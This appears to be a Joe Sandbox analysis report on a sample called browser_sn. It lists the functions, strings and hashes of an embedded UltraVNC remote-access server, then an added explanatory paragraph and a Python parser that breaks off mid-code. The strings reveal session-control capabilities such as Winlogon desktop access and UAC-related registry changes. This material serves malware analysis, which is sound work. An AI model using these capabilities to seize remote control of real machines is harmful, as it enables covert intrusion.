                                                                            • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                            • API String ID: 341937111-959611688
                                                                            • Opcode ID: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                            • Instruction ID: b35ca3b1ec15f057102c524d44ea44194f31bfe4537efaa998519cf3e71cc59d
                                                                            • Opcode Fuzzy Hash: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                            • Instruction Fuzzy Hash: 19C2D665A18A47E1EA808F51E8904B473B0FB5478EF905432DE8DD3728EEBDE24DD780
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                            • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 1732492099-311746058
                                                                            • Opcode ID: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                            • Instruction ID: f05d852e23b16035ac75d57c5400f03fab636844b9d9f3e014e4c9e848db9e50
                                                                            • Opcode Fuzzy Hash: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                            • Instruction Fuzzy Hash: 17F13831A08B8285EBA0EF21E8442A933B5FB5575EF444236CE9D87BA4DFBCE554C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
                                                                            • String ID: Chat with <%s> - UltraVNC$MS Sans Serif
                                                                            • API String ID: 3122538718-446500584
                                                                            • Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                            • Instruction ID: 0f8ed634c68795f1692ae6d25076ded72eb060dc20c768e49e48e7ea89f86be6
                                                                            • Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                            • Instruction Fuzzy Hash: B8F17E75A0864286EBA4DF26E4043A97371FB89B9EF104131DF8E87BA4CFBCE4558740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                            • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                            • API String ID: 767217470-2348971971
                                                                            • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                            • Instruction ID: 07292fce0415702578586ed3a586aafeb73acfa2ea400ac5d92081daefcf738d
                                                                            • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                            • Instruction Fuzzy Hash: 74C14B24E09A4281EA94EF51E8542B933B4FF56BAEF444535CEDE923A0CFBCE455D340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                            • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                                            • API String ID: 3851920378-1343955350
                                                                            • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                            • Instruction ID: 31b23b3a329f58e9e195cc941db82945320485b9f34e3cef18c1d451e32ec5a3
                                                                            • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                            • Instruction Fuzzy Hash: 47024872A096C286EB50DF64D4406EA37A1FB86B4DF484436DE8D97798DFBDE005C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                            • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                            • API String ID: 4207610217-3713657650
                                                                            • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                            • Instruction ID: 232d5173c6dce9173457acd39d1b9d3210a811f7c7b5371d8943b3ca2c8e1140
                                                                            • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                            • Instruction Fuzzy Hash: 62C17D61A18A8285EBA0DF24A8402BA73B0FF9578DF444536DE8E87B94DFBCD119C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
                                                                            • String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
                                                                            • API String ID: 463275814-2693335352
                                                                            • Opcode ID: d6a9e890ac1b439b16467652600ec118084fc3769fd8e43bc3eb75ddb6ca802c
                                                                            • Instruction ID: 487065355ea8d84d066f486a3bb1f99205453023801270a01210590b86444f0f
                                                                            • Opcode Fuzzy Hash: d6a9e890ac1b439b16467652600ec118084fc3769fd8e43bc3eb75ddb6ca802c
                                                                            • Instruction Fuzzy Hash: 46A16E25A0C68785FB90DF6598942B923B1EF96B4EF444832CE8ED7751DEBCE00AC744
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                            • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                            • API String ID: 1650122287-1031704962
                                                                            • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                            • Instruction ID: c61ab56d0d3e73c589b15ec40c44756f638dfafc8db18c578f877b10b8a58f0c
                                                                            • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                            • Instruction Fuzzy Hash: 7081F635908A8691EB91CF20E4543AD37A0FB59B9EF444172DE9E8B398DFB8E245C350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                            • String ID: ./\
                                                                            • API String ID: 385398445-3176372042
                                                                            • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                            • Instruction ID: 715c7e59ce932da5dfe2bcfd81bf129397caea0c2558b36d5f5fec9edf4ca4f1
                                                                            • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                            • Instruction Fuzzy Hash: ABE1A122A0C24286EBA09F21A4542BE77B0FB4575AF504935EFCD93B95DFBDE460CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
                                                                            • String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
                                                                            • API String ID: 2898369102-3720325205
                                                                            • Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                            • Instruction ID: 6f5894cdc6f4c2acdde6d05ba2a7d57b4cc54a1a993c7646ea28908ad09e6f49
                                                                            • Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                            • Instruction Fuzzy Hash: CBA12730A18A8282E6A0AF15A8442B973B0FFA579EF444135DECDC3B64DFBCE459D740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
                                                                            • String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                            • API String ID: 378279424-2704384803
                                                                            • Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                            • Instruction ID: 61d7ac766ca9dcc3ae9e13df29f56a4a257eea8269ba64a1ececf5f9962b70ec
                                                                            • Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                            • Instruction Fuzzy Hash: 2A026121B086C296FB689F65C5946B863A0FF46B4EF544536CF9E93390CFBCA458D301
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                            • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                            • API String ID: 33112563-1779637096
                                                                            • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                            • Instruction ID: 4373ab196080a6c4d1bee11e95ddc24bc4fa1e356d0a467640e0aa157cf41041
                                                                            • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                            • Instruction Fuzzy Hash: D2B11732508BC18AE368CF64F85469AB7A4FB44B09F94493ACBEA86350CFBDF055C754
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
                                                                            • String ID: F
                                                                            • API String ID: 2411647221-1304234792
                                                                            • Opcode ID: cc642ca3bff3ad97ef2125c9e7fe796bc43ee1a04bd7d1332a209876cd4ebe06
                                                                            • Instruction ID: 588f6dd20e1a247b0781e64c4cd7a872b2fa91bc705b2c3dc7b491964bf154f8
                                                                            • Opcode Fuzzy Hash: cc642ca3bff3ad97ef2125c9e7fe796bc43ee1a04bd7d1332a209876cd4ebe06
                                                                            • Instruction Fuzzy Hash: 9FC1B122708A8186E750DF26E8847AA77A1FB89B8EF558031DF8E83755DFBCE445C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                            • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                            • API String ID: 2697070071-1399849103
                                                                            • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                            • Instruction ID: cbf8263b789308a93e6d1a2b25325af88bd7db3a07566bfa2d25a85b05a473ec
                                                                            • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                            • Instruction Fuzzy Hash: 4481813561878286EB94DF25AC0466A73A5FF89B8AF485135DECE87B64DF7CE004DB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                            • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                            • API String ID: 2145620463-2328478964
                                                                            • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                            • Instruction ID: 472f533ba8289682c68925aa26ada8a21cc79d489671a22e5a8348546e49ef55
                                                                            • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                            • Instruction Fuzzy Hash: 63E1DE22A18A828AF760DF28D8442AA73B0FB5579DF404231DE8E87B94DFBCD655D740
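The per-function records in this section carry the strings Joe Sandbox recovered from each function, joined with `$`: the record that resolves winsta.dll, WinStationConnectW and LockWorkStation and names the Winsta0\Winlogon desktop, the record that opens the \\.\Pipe\TerminalServer\SystemExecSrvr\%d pipe, and the record that checks the mv2.dll mirror driver version. Read together they describe what the embedded VNC server can do once it runs as a service. The following is an added reading aid, not Joe Sandbox's own parser and not UltraVNC code: it parses records in this report format, splits the list-valued fields, and reduces them to a capability summary. The indicator table and the heuristic on the API ID field are my assumptions, built only from strings that appear in this report; the three-record sample is constructed from the page with the leading whitespace removed.

```python
"""Parse the per-function 'Similarity' records of a Joe Sandbox report and
flag what their string lists say about a VNC server's capabilities.

Added reading aid, not Joe Sandbox's parser and not UltraVNC code.  The
INDICATORS table is my assumption, built only from strings present in this
report; resolves_apis_dynamically() is an assumption about how the report
groups API names in its 'API ID' field."""
import re

# Constructed sample: three records in the bullet form the report uses,
# copied from the page with the leading whitespace removed.
SAMPLE = """\
Similarity
• API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile
• String ID: LockWorkStation$WinStationConnectW$Winsta0\\Winlogon$h$user32.dll$winsta.dll
• API String ID: 2898369102-3720325205
• Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Similarity
• API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
• String ID: access denied, permission problem$ driver Active$1.00.22$mv video hook driver2$mv2.dll
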